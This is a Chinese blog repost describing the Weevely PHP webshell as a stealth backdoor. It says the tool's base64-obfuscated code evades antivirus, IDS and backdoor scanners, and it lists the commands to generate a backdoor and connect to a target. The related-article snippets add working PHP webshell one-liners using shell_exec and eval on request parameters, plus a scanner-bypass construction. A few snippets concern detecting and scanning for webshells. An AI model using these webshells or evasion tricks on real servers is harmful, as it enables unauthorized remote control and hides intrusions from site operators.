php后门拿下当前目录

最新推荐文章于 2023-12-26 20:30:00 发布
最新推荐文章于 2023-12-26 20:30:00 发布
阅读量364 收藏
点赞数
文章标签: php shell
原文链接:http://www.cnblogs.com/chenlove/p/8652159.html
版权

Weevely是一个模拟类似telnet的连接的隐形PHP网页shell。它是Web应用程序后期开发的必备工具,可以作为隐形后门程序,也可以作为一个web外壳来管理合法的Web帐户,甚至可以免费托管。

 

weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web 页面式的管理,weevely生成的服务器端php代码是经过了base64编码的,所以可以骗过主流的杀毒软件和IDS,上传服务器端代码后通常可以通过weevely直接运行。

 

weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术,后门中所使用的函数均是常用的字符串处理函数,被作为检查规则的eval,system等函数都不会直接出现在代码中,从而可以致使后门文件绕过后门查找工具的检查。使用暗组的Web后门查杀工具进行扫描,结果显示该文件无任何威胁。

 

用法:

1、生成后门代理

weevely generate <password> <path>

 

2、运行终端到目标

weevely <URL> <password> [cmd]

 

3、加载会话文件

weevely session <path> [cmd]

 

 

 

 

 

转载于:https://www.cnblogs.com/chenlove/p/8652159.html

aici0819
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php webshell 下载(目前功能强大齐全的php版webshell
11-09
声明:本PHP-webshell仅供学习交流以及网站安全检测之用,功能过于强大,请不要用过非法用途,否则一切后果由使用者本人承担! 使用方法:上传至网站任意目录连接即可,其中 $admin['pass'] = "admin"; 后面引号里的admin为连接密码,可自由修改此密码。 网络上ASP的webshell很多,但是发现PHP webshell少了很多,好不容易找到这功能齐全的php版的webshell,给大家分享一下,省得大家到处找。顺便在这里赚点积分,呵呵。。
WebShell
热门推荐
高飞的博客
03-06 11万+
webshell
网络攻击之WebShell
qq_44887910的博客
09-05 1121
WebShell 攻击
Linux系统的PHP-Webshell后门实验
A0000FF的博客
04-02 809
中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。
【转】Webshell入侵检测初探
tpriwwq的专栏
06-13 1271
0×01:Webshell简介 攻击者在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。常见攻击方式有:直接上传获取webshell、SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本(XSS)作为攻击的一部分,甚至一些比较老旧的方法利用后台数据库备份及恢复获取webshell、数据库压缩等。通用功能包括但不限于shell命...
php后门URL的防范
10-26
后门URL是指虽然无需直接调用的资源能直接通过URL访问
phpscan,php后门扫描神器
08-12
phpscan,php后门扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,里面附详细的使用说明
一些 PHP 管理系统程序中的后门
10-29
一些php网站管理程序的,一些后门,其实官方也没有恶意,主要是大家为了自己的安全。
360webscan后门查杀php专版
04-18
自用的,360webscan后门查杀php专版,3个文件均能扫描,上传到网站根目录下运行
Php后门php 后门
06-25
php 后门
php 实现webshell
echo_heng的博客
12-15 2251
php实现webshell主要依靠swoole和ssh2扩展,前端展示页面使用xterm 废话不多说直接上代码 后端代码 <?php /** * websocket服务器(使用swoole) * 使用ssh登录服务器 */ class Ws{ private $shell; private $connection; private $isConnection; private $ws; public function __construct(){
webshell详解
w17791476027的博客
08-03 3478
概念webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门文件,得到一个命令执行环境,以达到控制网站服务器的目的。从字面上来说,webshell单词可以拆成web和shell。其中web即服务器所开放的web服务。Shell即命令执行环境,用户与服务器操作系统交互的接口。
渗透测试 | php的webshell绕过方法总结
2301_80115097的博客
12-26 168
这里设置一个用户自定义函数a,当里面有参数时,返回该参数的内容,这里shell里的a($_REQUEST)[1] 的实际效果为 a($_REQUEST),相当于是a($a),会返回$a的内容,结果为$_REQUEST,最后一行的实际内容为eval($_REQUEST[1]);测试可以正常连接phpclass User?
几种好用的经典webshellphp
cnmeimei的博客
09-04 1044
php经典一句话: <?php echo shell_exec($_GET['cmd']);?> 中国菜刀:官网:www.maicaidao.co原理:上传一句话(<?php @eval($_POST['我是密码']);?>)至服务器端,再用中国菜刀客户端(图形化界面)去连接服务器 webacoo(kali):特点:传输的数据包裹在cookie中,并非http包体内,起到一定绕过作用原理:生成webshell,上传至目标服务器,再拿webacoo去连接该webshell...
php 绕waf,【技术分享】php webshell分析和绕过waf技巧
weixin_42138703的博客
03-11 607
作者:阻圣预估稿费:400RMB(不服你也来投稿啊!)投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿前言WebShell是攻击者使用的恶意脚本,它的用途主要是在攻击后的Web应用程序上建立持久性的后门。webshell本身不能攻击或者利用远程漏洞,所以说它总是攻击的第二阶段,这个阶段我们经常称为post-exploitation。(PS:Post Exploitation是国...
php webshell编写,php webshell学习
weixin_34805308的博客
03-26 724
一、环境kali 192.168.43.177开户apache /etc/init.d/apache2 start/var/www/html/目录下编辑php代码hackbarhttps://github.com/Mr-xn/hackbar2.1.3二、php基础输出函数:echo - 可以输出一个或多个字符串print - 只允许输出一个字符串,返回值总为 1提示:echo 输出的速度比 pri...
PHP WebSehll 后门脚本与检测工具
悦分享
08-01 1269
PHP是一种动态弱类型语言,参数传递、类型转换、函数调用方式都非常灵活,这给开发者带来开发便利的同时,也给攻击者编写各种畸形恶意代码带来了很多便利,通过翻阅PHP手册
二进制加密PHP Webshell原理及简单实现
永远是少年
02-07 2210
今天继续给大家介绍渗透测试相关知识,本文主要内容是二进制加密PHP Webshell原理及简单实现。 一、二进制加密PHP Webshell原理 二、二进制加密PHP Webshell服务端实现 三、二进制加密PHP Webshell客户端实现
php源码扫描后门工具
最新发布
01-23
PHP源码扫描后门工具是一种可以帮助开发者检测PHP源代码中是否存在后门的工具。这种工具通常会使用静态代码分析技术,对PHP源码进行深入扫描和分析,以便找出可能存在的后门代码或者安全漏洞。 这种工具的工作原理通常是通过识别常见的后门代码特征,如eval、assert、system等函数的调用,或者是通过检测非常规的文件操作、远程代码执行等可疑行为。一旦发现可能存在后门的代码片段,工具会向开发者报告,以便开发者可以及时对代码进行修复和加固。 PHP源码扫描后门工具对于保障PHP代码的安全性非常重要。因为PHP是一种开放式的脚本语言,用户可以较为灵活地编写各种代码,但同时也容易受到恶意攻击者的攻击。使用这种工具可以帮助开发者及时发现并修复潜在的安全隐患,保障系统的安全性。 当然,虽然PHP源码扫描后门工具可以发挥一定的作用,但它并不是万能的。开发者在使用这种工具的同时,还需要注重编码规范和安全意识的培养,定期对代码进行审查和加固,以建立一个更加健壮和安全的PHP应用系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值